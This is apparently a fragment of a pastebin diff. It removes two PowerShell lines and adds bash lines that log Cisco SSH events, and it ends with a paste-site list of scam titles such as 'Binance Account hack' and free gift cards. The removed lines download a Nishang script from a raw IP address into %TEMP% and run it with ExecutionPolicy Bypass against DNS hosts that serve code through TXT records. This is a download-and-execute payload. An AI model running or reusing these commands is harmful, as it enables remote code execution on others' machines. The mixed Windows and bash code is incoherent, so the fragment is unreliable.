1351	-	powershell.exe (new-object System.Net.WebClient).DownloadFile('http://149.28.201.171/nishang/Execution/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')
1351	+	echo "SSH event: $line" >> ssh_events.log
1352	-	powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com
1352	+	fi
1353		done < cisco.log
1354		-------------------------------------------------------------------------------
1355		This script classifies and logs different events (interface down, DHCP conflicts, and SSH status changes) into their respective logs.

Public Pastes

⭐️ EARN $500 INSTANTLY KE
JavaScript | 58 sec ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 8 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 9 min ago | 0.17 KB
⭐ FREE giftcards method ON
JavaScript | 17 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 18 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 25 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 26 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 34 min ago | 0.17 KB